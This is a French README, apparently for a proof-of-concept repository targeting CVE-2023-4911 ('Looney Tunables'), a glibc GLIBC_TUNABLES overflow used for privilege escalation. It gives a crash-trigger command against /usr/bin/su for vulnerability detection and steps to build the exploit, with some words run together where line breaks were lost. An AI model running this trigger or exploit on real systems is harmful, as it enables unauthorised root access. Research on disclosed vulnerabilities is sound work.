
Preuve de concept d'exploit pour CVE-2023-4911 (Looney Tunables), ciblant un dépassement de tampon dans l'analyse de GLIBC_TUNABLES de glibc. Comprend la détection de vulnérabilité et un exploit compilé pour l'escalade de privilèges.
Ceci est une Preuve de Concept (PoC) de CVE-2023-4911 (alias "Looney Tunables") exploitant un bogue dans la fonction d'analyse de la variable d'environnement GLIBC_TUNABLES du chargeur dynamique de glibc, parse_tunables().
env -i "GLIBC_TUNABLES=glibc.malloc.mxfast=glibc.malloc.mxfast=A" "Z=`printf '%08192x' 1`" /usr/bin/su --help
Segmentation fault (core dumped), alors nous avons affaire à une cible vulnérable.libc.so.6python3 libc.py
gcc exp.c -o exp
Tout le code fourni dans ce dépôt est uniquement à des fins éducatives et de recherche. Toute action et/ou activité liée au contenu de ce dépôt relève de votre seule responsabilité. L'utilisation abusive du code de ce dépôt peut entraîner des poursuites pénales contre les personnes concernées. L'auteur ne pourra être tenu pour responsable dans l'éventualité où des poursuites pénales seraient engagées contre des individus utilisant abusivement le code de ce dépôt pour enfreindre la loi.